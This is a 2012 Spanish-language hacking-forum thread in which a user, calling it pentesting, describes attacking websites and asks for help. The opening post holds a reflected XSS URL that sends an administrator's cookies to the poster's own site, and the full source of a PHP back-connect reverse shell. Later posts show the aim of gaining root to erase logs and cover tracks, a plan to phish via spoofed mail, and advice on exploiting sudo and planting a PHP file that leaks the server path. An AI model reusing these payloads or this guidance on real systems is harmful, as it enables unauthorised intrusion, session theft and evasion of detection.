elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Dudas en diversos pentest...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Dudas en diversos pentest...  (Leído 4,670 veces)
Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Dudas en diversos pentest...
« en: 18 Abril 2012, 18:50 pm »

Haber gentecilla :) hace ya mucho que no me pasaba por aqui y ahora tengo muchas dudas y no se como solucionarlas a ve si alguien me echa una mano...

PRIMERO:

Estoy llevando un pentest hacia una web y he encontrado un uploader sin filtros he subido una shell modificada para tener un aspecto mas amigable pero no he encontrado la ruta donde se envian los archivos, en mi busqueda he encontrado tambien una FPD(Full Path Disclosure) pero obvio que no muestra la ruta de la shell, tambien he encontrado una SQL injection pero tampoco me vale para nada ya que no hay ni siquiera un panel de contenidos, no al total del servidor.

SEGUNDA:

Realizando otro pentest he encontrado una XSS no persistente os paso la inyeccion a ver si lo hago bien esque es la primera que hago :S el buscador no tiene filtros ni nada y al realizar una busqueda aparece:

Código
  1. <li><span class="totalpaginas">Resultados para mibusqueda</span></li>

y la url queda asi:

http://www.idomain.com/buscador/results?title=mibusqueda

Asi que la url que e preparado es esta:

www.idomain.com/buscador/results?title=</span></li><script>window.location=’http://miweb/ckie.php=’+document.cookie</script>

supongo que bastante simple no? pero bueno am y tengo otra duda respecto a esto necesitaria luego redireccionar al administrador a la web que quiera eso en JS como se haria?

TERCERO:

Tengo una shell inversa en php con este programa:

Código
  1. <?php
  2.  
  3. /*********************
  4.  
  5. @@author : lionaneesh
  6. @@facebook : facebook.com/lionaneesh
  7. @@Email : lionaneesh@gmail.com
  8.  
  9. ********************/
  10.  
  11.  
  12. ini_set('max_execution_time',0);
  13.  
  14. ?>
  15.  
  16. <html>
  17. <head>
  18.    <title>Back Connect Shell -- PHP</title>
  19. </head>
  20.  
  21. <body>
  22.  
  23. <h1>Welcome to Back Connect Control Panel </h1>
  24.  
  25. <p> Fill in the form Below to Start the Back Connect Service </p>
  26.  
  27. <?php
  28. if( isset($_GET['port']) &&
  29.    isset($_GET['ip']) &&
  30.    $_GET['port'] != "" &&
  31.    $_GET['ip'] != ""
  32.    )
  33.    {
  34.        echo "<p>The Program is now trying to connect!</p>";
  35.        $ip = $_GET['ip'];
  36.        $port=$_GET['port'];
  37.        $sockfd=fsockopen($ip , $port , $errno, $errstr );
  38.        if($errno != 0)
  39.        {
  40.            echo "<font color='red'><b>$errno</b> : $errstr</font>";
  41.        }
  42.        else if (!$sockfd)
  43.        {
  44.               $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
  45.        }
  46.        else
  47.        {
  48.            fputs ($sockfd ,
  49.            "\n=================================================================\n
  50.            Back Connect in PHP\n
  51.            Coded by lionaneesh\n
  52.            @@author : lionaneesh
  53.            @@facebook : facebook.com/lionaneesh
  54.            @@Email : lionaneesh@gmail.com
  55.            \n=================================================================");
  56.         $pwd = shell_exec("pwd");
  57.         $sysinfo = shell_exec("uname -a");
  58.         $id = shell_exec("id");
  59.         $dateAndTime = shell_exec("time /t & date /T");
  60.         $len = 1337;
  61.         fputs($sockfd ,$sysinfo . "\n" );
  62.         fputs($sockfd ,$pwd . "\n" );
  63.         fputs($sockfd ,$id ."\n\n" );
  64.         fputs($sockfd ,$dateAndTime."\n\n" );
  65.         while(!feof($sockfd))
  66.         {
  67.            $cmdPrompt ="(Shell)[$]> ";
  68.            fputs ($sockfd , $cmdPrompt );
  69.            $command= fgets($sockfd, $len);
  70.            fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  71.         }
  72.         fclose($sockfd);
  73.        }
  74.    }
  75.    else
  76.    {
  77.    ?>
  78.    <table align="center" >
  79.         <form method="GET">
  80.         <td>
  81.            <table style="border-spacing: 6px;">
  82.                <tr>
  83.                    <td>Port</td>
  84.                    <td>
  85.                        <input style="width: 200px;" name="port" value="31337" />
  86.                    </td>
  87.                </tr>
  88.                <tr>
  89.                    <td>IP </td>
  90.                    <td><input style="width: 100px;" name="ip" size='5' value="127.0.0.1"/>
  91.                </tr>
  92.                <tr>
  93.                <td>
  94.                <input style="width: 90px;" class="own" type="submit" value="Connect back :D!"/>
  95.                </td>
  96.                </tr>  
  97.  
  98.            </table>
  99.         </td>
  100.         </form>
  101.    </tr>
  102.    </table>
  103.    <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
  104. <?php
  105.    }
  106. ?>

El problema es que a pesar de el uso de varios exploits para intentar escalar privilegios no consigo la shell de root :( la maquina es ubuntu y el kernel:

2.6.28.8-20120119a-iscsi-ntacker-3ware-amd-sec8-ram64-grsec

bueno a pesar de la busqueda exahustiva por google no consigo nada :( asiqeu a ver si me podeis echar una manita :P un saludo chicos!!!!
En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
Breixo

Desconectado Desconectado

Mensajes: 37



Ver Perfil WWW
Re: Dudas en diversos pentest...
« Respuesta #1 en: 18 Abril 2012, 22:55 pm »

El uploader que comentas de que se trata, para que se supone que es?

En el XSS, el administrador tendría que hacer click en ese enlace para poder robarle las cookies, o bien entrar en alguna página que tengas bajo control y le redireciones hacia ese enlace.

En el tercer caso, mira a ver si sudo es vulnerable, por ejemplo este http://unaaldia.hispasec.com/2012/01/elevacion-de-privilegios-en-sudo-en.html
En línea

Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: Dudas en diversos pentest...
« Respuesta #2 en: 25 Abril 2012, 19:19 pm »

Haber, el uploader era de un curriculum pero estaba sin filtros solo ponia una recomendacion en plan porfavor prefiero .doc o .pdf aun asi enfin lo he dejado por unos dias asi a ver si se me ocurre algo.

El XSS ya esta todo claro, luego he añadido un window.location que lo llevara a la pagina que se supone que tiene que ir para que el ataque no quede "descolgado" el resto ingenieria social, aunqeu todavia estoy mirando desde donde lo voy a enviar si desde una web mail spoofing o desde un correo propio todo depende del pretexto :)

Buah aver el sistema es debian y lo he probado todo a nivel del kernel he usado montonazo de exploits, creo que el comando sudo en este sistema no funciona, tiene el su pero tampoco e encontrado vulns a ese nivel, he listado todos los programas a ver si encuentro algun bug que explotar pero he subido y eliminado cientos de exploits estoy casi asta los huev** :) necesito conseguir acceso a los logs para borrar mis huellas y para eso necesito root :( alguien se le ocurre algo? si necesitais mas info...

Un saludo!
En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: Dudas en diversos pentest...
« Respuesta #3 en: 27 Abril 2012, 02:48 am »

Haber, el uploader era de un curriculum pero estaba sin filtros solo ponia una recomendacion en plan porfavor prefiero .doc o .pdf aun asi enfin lo he dejado por unos dias asi a ver si se me ocurre algo.

Para empezar habrá que ver si es un CMS tipo Joomla, WP, pero por los bugs encontrados va a ser que no...

Luego tendrás que pensar ¿Se guarda en el servidor? Por que quizás se envié por correo electrónico.

Por último también puedes crear un .php que al ejecutarlo se te envíe un correo mediante mail() donde te indique la dirección interna. Quizás si alguna aplicación para verificarlo lo ejecuta o el propio administrador le sale como link te pueda funcionar...
En línea




Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: Dudas en diversos pentest...
« Respuesta #4 en: 15 Mayo 2012, 19:10 pm »

Dios.. muy imaginativo dimitrix no se me habia ocurrido :) bueno me disculpo por las tardanzas pero no e podido estar muy activo gracias por su ayuda..
En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Tutorial XSRF 2 Pentest
Nivel Web
Dedal0 4 5,482 Último mensaje 4 Diciembre 2009, 01:30 am
por Castg!
Distros pentest......................
Foro Libre
gevenux 8 6,036 Último mensaje 1 Febrero 2011, 12:40 pm
por gevenux
Taller auditoria y pentest 2011
Hacking
bernolas 4 5,376 Último mensaje 10 Febrero 2012, 21:40 pm
por imaginawireless
que es un pentest?
Hacking
pedro51 1 4,151 Último mensaje 17 Septiembre 2011, 17:54 pm
por madpitbull_99
Actualización Taller de Auditoria y pentest 2012
Hacking
bernolas 2 3,637 Último mensaje 26 Junio 2012, 20:55 pm
por imaginawireless
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines